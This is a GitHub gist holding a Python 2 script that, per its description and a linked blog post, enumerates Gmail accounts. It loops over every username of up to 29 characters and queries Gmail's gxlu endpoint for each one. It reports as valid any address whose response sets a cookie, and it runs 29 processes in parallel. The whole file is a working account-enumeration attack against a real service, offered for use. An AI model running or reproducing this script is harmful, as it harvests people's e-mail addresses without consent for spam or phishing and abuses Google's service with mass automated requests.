-
-
Save mluis/309977cd5efba0a01dd9b4c1ad494cb8 to your computer and use it in GitHub Desktop.
reveals users from https://blog.0day.rocks/abusing-gmail-to-get-previously-unlisted-e-mail-addresses-41544b62b2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import multiprocessing | |
import imp | |
import urllib2 | |
import urlparse | |
urllib = imp.new_module('urllib') | |
urllib.error = urllib2 | |
urllib.parse = urlparse | |
urllib.request = urllib2 | |
debug = False | |
possibleChars = {'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', | |
'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '.', | |
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9'} | |
def testForCookie(account): | |
d = urllib.request.urlopen("https://mail.google.com/mail/gxlu?email=" + account + "@gmail.com") | |
if "Set-Cookie" in d.info(): | |
print account + "@gmail.com" | |
def printAllRecursive(prefix, k): | |
if (k == 0): | |
if debug: | |
print "DEBUG: %s" % prefix | |
testForCookie(prefix) | |
return | |
for char in possibleChars: | |
if (prefix == "") and (char == '.'): | |
continue | |
newPrefix = prefix + char | |
printAllRecursive(newPrefix, k - 1) | |
def printAll(k): | |
printAllRecursive("", k) | |
if __name__ == '__main__': | |
jobs = [] | |
for i in range(1,30): | |
p = multiprocessing.Process(target=printAll, args=(i,)) | |
jobs.append(p) | |
p.start() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment